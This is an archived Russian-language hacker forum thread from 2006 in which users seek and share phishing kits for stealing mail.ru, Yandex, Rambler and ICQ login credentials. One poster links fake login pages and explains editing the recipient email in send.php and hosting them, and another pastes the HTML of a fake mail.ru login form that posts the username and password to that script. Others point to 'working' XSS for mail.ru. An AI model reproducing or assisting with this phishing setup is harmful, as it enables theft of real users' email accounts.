Просмотр полной версии : нужна активная XSS в почте mail.ru
qwert125
05.11.2006, 19:30
Подскажите скрипт который можно было бы отправить по мылу при открытии которого жертву перебрасывало бы на мою страничку клон-страницы которую выдает mail.ru ри вводе не правильного пароля
и скрипт для этой странички чтобы заново введеные данные отправлялись мне на мыло
Наверняка кто нибудь такое делал
Врятли тебе такое напишут....
Максимум что ты можешь сделать так это самому такое сварганить либо купить этот скрипт..
qwert125
05.11.2006, 20:19
так зачем же писать,может у кого уже есть готовое?
Undernative
05.11.2006, 21:28
http://dump.ru/files/8/8651969201/
Мои фейковые страница для
-mail.ru
-yandex.ru
-rambler.ru
-ICQ
в файле form.php смени мыло вместо beast-6@*****.ru на свое...и сливай все содержимое на домены holm.ru там лучше всего пашет
А на счет отправки письма используй либо Outlook ,в нем юзай гиперссылку чтобы скрыть ссылку ,либо пиши скрипт,его я не могу тебе написать.Ибо это сделай сам.
nc.STRIEM
05.11.2006, 21:33
так зачем же писать,может у кого уже есть готовое?
Это те нужна активная XSS в почте mail.ru! Такие вещи всегдща есть, но те которые попадают в паблик долго не живут! поэтому кто знает тот молчит! хотя за деньги скажут))
qwert125
05.11.2006, 23:28
http://dump.ru/files/8/8651969201/
Мои фейковые страница для
-mail.ru
-yandex.ru
-rambler.ru
-ICQ
в файле form.php смени мыло вместо beast-6@*****.ru на свое...и сливай все содержимое на домены holm.ru там лучше всего пашет
А на счет отправки письма используй либо Outlook ,в нем юзай гиперссылку чтобы скрыть ссылку ,либо пиши скрипт,его я не могу тебе написать.Ибо это сделай сам.
че то я в файле form.php не нашел beast-6@*****.ru <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- saved from url=(0073)http://lineage2world.jino-net.ru/-%20Lineage2World_com%20-_files/form.php --> <HTML><HEAD> <META http-equiv=Content-Type content="text/html; charset=windows-1251"><LINK href="form.files/dubie.css" type=text/css rel=stylesheet> <META content="MSHTML 6.00.2800.1106" name=GENERATOR></HEAD> <BODY style="FONT-SIZE: 15px; FONT-FAMILY: Verdna" bgColor=#ffffff leftMargin=0 topMargin=0> <FORM action=send.php method=post> <P>Логин : <INPUT size=30 name=Name><tr><td class=form width=100%> <td><select size=1 name=Domain class=long tabindex=2> <option value=mail.ru >@mail.ru</option><option value=inbox.ru >@inbox.ru</option><option value=bk.ru >@bk.ru</option><option value=list.ru >@list.ru</option> </select></td> </table> </td> </tr></P> <P>Пароль: <INPUT type=password size=30 name=Email></P> <BR><BR> <CENTER><INPUT type=submit value=Войти> </CENTER></FORM></BODY></HTML>
а потом, я то залью mail.htm а form.php куда заливать то? :(
тебе сюда! http://forum.antichat.ru/threadedpost217073.html#post217073
Undernative
06.11.2006, 00:33
че то я в файле form.php не нашел beast-6@*****.ru
потом, я то залью mail.htm а form.php куда заливать то?
1.CОрри напутал...в файле send.php
2.Допустим папка mail.ru ,все что в ней есть сливай на хост и все
qwert125
06.11.2006, 00:35
За то я нашел в файле send.php beast-6@yandex.ru поменял его на свой и все содержимое папки залил на holm.ru но ни хера не получается,правда я страницу mail.htm свою залил,потому как в твоей три орфографические ошибки,не знаю на сколько это важно...
qwert125
06.11.2006, 00:38
Вот посмотри http://qwert125.h17.ru/mail.htm
Undernative
06.11.2006, 00:42
пиши в ПМ !
qwert125
06.11.2006, 00:51
...а что такое ПМ?
...а что такое ПМ?
Улыбнуло )))
ПМ - это Персональное Сообщение
Вот люди пошли... Xss им нада, а даже не знаю что такое ПМ...
Наверно просто причли, что Xss это круто и с ним все можно :-d
Плиз вышлите кто нить в ПМ!!! Пажалуйста!
qwert125
07.11.2006, 14:28
Chumak че выслать то?
Undernative
09.11.2006, 16:36
Активную xss!
:D :D :D
-=lebed=-
09.11.2006, 17:30
http://forum.antichat.ru/showthread.php?t=26862 вот тут все смотрите - свежак рабочий
Можно затестить http://otvet.mail.ru/question/961034/
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot